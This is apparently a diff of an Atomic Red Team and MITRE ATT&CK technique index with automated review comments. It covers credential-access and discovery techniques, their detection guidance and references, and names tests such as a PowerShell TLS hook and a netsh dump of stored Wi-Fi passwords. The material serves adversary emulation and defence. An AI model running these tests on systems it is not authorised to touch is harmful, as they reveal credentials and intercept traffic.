Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
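Review bot: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) is removed from T1056.004 with nothing replacing it, as it was for T1003.006 above, so the technique object no longer says what privilege hooking needs; the only remaining privilege hint is the per-test `elevation_required: true` on the PowerShell TLS hook test. If downstream rendering read the technique-level field, it needs to fall back to the test-level one. The rest of this hunk only re-sorts `external_references` and re-emits the metadata that the preceding hunk deleted, so it is worth reading the two hunks together when reviewing for dropped entries; the fourteen references do match.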
@@ -81107,7 +81827,7 @@ credential-access:
elevation_required: true
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -81164,9 +81884,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
@@ -81197,7 +81916,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
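Review bot: the `modified` timestamp for T1556.004 moves backwards, from `2022-05-11T14:00:00.188Z` to `2021-12-14T23:14:26.107Z`. The same regression appears for T1613, T1016.001, T1615, T1652, T1069.002, T1007 and T1120 below, and every old value shares the `T14:00:00.188Z` suffix, which looks like a batch-generated placeholder rather than an upstream timestamp. That is probably the intended fix, but the commit message should say that `modified` is now taken from upstream as-is, because any consumer that uses `modified` for change detection will see these as stale entries.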
@@ -81221,8 +81940,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
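Review bot: T1556.004 loses `x_mitre_attack_spec_version` outright (`2.1.0` removed, nothing added), whereas the other objects in this patch have it re-emitted as `3.2.0`; T1016.001 gets the same treatment in its hunk below. If that mirrors upstream objects that lack the field, fine, but a reader of the field that does not handle a missing key will now break on exactly these two. Note also that `x_mitre_permissions_required: Administrator` is kept here while it was deleted for T1003.006 and T1056.004, so the treatment of that field is inconsistent within one patch.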
discovery:
T1033:
@@ -81287,7 +82004,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests:
- name: System Owner/User Discovery
@@ -81406,7 +82122,7 @@ discovery:
'
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -81465,7 +82181,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -81486,7 +82201,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -81507,8 +82222,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests:
- name: Check internet connection using ping Windows
@@ -81592,7 +82305,7 @@ discovery:
'
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -81615,15 +82328,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
@@ -81649,13 +82361,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -81680,12 +82391,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -81727,13 +82437,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -81794,7 +82503,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests:
- name: Display group policy information via gpresult
@@ -81885,7 +82593,7 @@ discovery:
elevation_required: true
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -81949,7 +82657,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests:
- name: Device Driver Discovery
@@ -81971,14 +82678,14 @@ discovery:
elevation_required: false
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
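Review bot: the `-`/`+` pair at `utility, dscacheutil -q group` / `on macOS, and ldapsearch` is identical as rendered, so the change is whitespace or an invisible character in the T1087.002 description. A whitespace-only churn in description text is noise in every future diff of this file; either normalise it in the generator or call it out in the commit message so reviewers do not hunt for a content change that is not there.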
@@ -82025,7 +82732,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests:
- name: Enumerate all accounts (Domain)
@@ -82587,7 +83293,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests:
- name: Enumerate all accounts on Windows (Local)
@@ -82640,7 +83345,7 @@ discovery:
name: command_prompt
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -82730,13 +83435,12 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (Windows)
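Review bot: the Deloitte reference only gains a new retrieval date and a `/edit` suffix on a Google Drive URL, which is a fragile citation target that can stop resolving without notice. The Prevailion reference later in this patch is pointed at a web.archive.org snapshot instead; the same approach would be more durable here, with the archive URL recorded in `url` and the retrieval date left to describe when it was captured.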
@@ -82776,7 +83480,7 @@ discovery:
if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
@@ -82819,7 +83523,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests:
- name: Basic Permission Groups Discovery Windows (Domain)
@@ -83121,7 +83824,7 @@ discovery:
name: command_prompt
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -83162,7 +83865,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests:
- name: System Service Discovery
@@ -83212,7 +83914,7 @@ discovery:
command: powershell.exe Get-Service
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -83297,7 +83999,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests:
- name: Packet Capture Windows Command Prompt
@@ -83474,7 +84175,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests:
- name: Network Share Discovery command prompt
@@ -83663,7 +84363,7 @@ discovery:
elevation_required: false
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -83714,7 +84414,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests:
- name: Win32_PnPEntity Hardware Inventory
@@ -83765,7 +84464,7 @@ discovery:
'
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -83776,7 +84475,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -83791,7 +84489,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -83839,7 +84536,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests:
- name: System Information Discovery
@@ -84334,7 +85032,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests:
- name: Enumerate Stored Wi-Fi Profiles And Passwords via netsh
@@ -84349,7 +85046,7 @@ discovery:
elevation_required: false
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -84391,12 +85088,11 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests:
- name: List Process Main Windows - C# .NET
@@ -84438,112 +85134,64 @@ discovery:
name: command_prompt
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
